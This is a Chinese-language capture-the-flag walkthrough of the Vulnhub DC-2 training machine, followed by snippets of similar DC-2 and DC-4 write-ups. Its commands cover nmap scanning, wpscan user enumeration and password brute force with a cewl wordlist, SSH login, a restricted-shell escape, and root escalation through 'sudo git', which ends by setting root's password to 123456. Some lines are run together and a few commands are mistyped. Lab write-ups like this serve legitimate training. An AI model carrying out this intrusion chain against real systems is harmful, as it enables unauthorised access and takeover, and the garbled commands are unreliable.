描述:靶機dc-2共有5個flag,最終需要root許可權
才可以找到並檢視flag
環境:vmware虛擬機器軟體
1.檢視ip
nmap -sp 192.168.1.0/24 檢視ipnmap -a 192.168.1.146 #這裡我的靶機ip是146
2.瀏覽器訪問
,發現無法正常訪問頁面,但在url位址列會有http://dc-2
網域名稱提示,發現問題是本地無法解析網域名稱dc-2
4.新增網域名稱解析後,可以正常訪問網頁資訊,並能在flag頁面找到flag1
提示使用cewl密碼字典生成工具,並且在登入後可以找到下乙個flag
5.flag1提示可以登入,但正常訪問網頁無法找到登入頁面,所以使用nikto工具掃瞄**結構,找到wp-login.php登入頁面
6.訪問登入頁面:http://dc-2/wp-login.php
7.使用wpscan工具掃瞄**,獲取可以登入**的使用者名稱,掃瞄後可以找到三個使用者名稱:admin、tom、jerry
8.將掃瞄到的三個使用者名稱新增到dc-2users.list
vim dc-2users.list9.使用flag1中提示的工具cewl生成密碼字典dc-2.dicadmin
tomjerry
cewl dc-2 -w dc-2.dic10.使用wpscan工具爆破可以登入使用者的密碼,可成功爆破tom和jerry使用者,密碼為:cat dc-2.dic
jerry / adipiscing
tom / parturient
wpscan --url dc-2 -u dc-2users.list -p dc-2.dic11.用ssh對其中乙個進行連線,輸入密碼ssh [email protected] -p 7744bash_cmds[a]=/bin/sh;a #呼叫/bin/sh命令直譯器找到flag3export path=$path:/bin/ #使用bash命令直譯器
export path=$path:/usr/bin #設定環境變數
切換到jerry使用者找到flag4
flag4 提示我們可以使用git,我們可以通過git來提權
sudo -l #檢視可以使用root許可權無密碼的命令,有git命令然後彈出一堆東西最後是個冒號,我們在冒號後面輸入sudo git -p help #提權
! /bin/bash然後就到了root使用者再輸入id ,whoami檢視自己的成果!whoami #檢視當前使用者找到5個flag檔案,並提權成功!passwd root #修改root密碼
123456 #密碼修改為:123456
su root #切換到root使用者
cd /root #進入到root家目錄下
ls #找到final-flag.txt
Vulnhub靶機實戰(二) DC 2
開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...
滲透實戰 滲透測試實戰 DC 2 靶機入侵
dc 2 靶機實戰 啟動dc 2 配置其網路為nat,檢視其mac 位址,重啟dc 2 使其網路配置生效 使用nmap 掃瞄內網網段 得到dc 2 的ip位址192.168.1.162 對其進行資訊收集 訪問其ip 連線失敗 新增本地dns解析 再訪問該 解析成功 cewl 工具 cewl dc 2...
Vulnhub實戰靶場 DC 4
一 環境搭建 3 為了正常練習,將靶場的網絡卡模式設定為橋接模式,啟動即可 二 靶場攻略 2 使用命令 nmap a p 192.168.1.7,尋找突破口,發現開啟80和22埠 4 得到乙個命令執行的地方 可以檢視檔案 再次使用burpsuite抓包,通過修改radio引數,可以執行系統命令 5 ...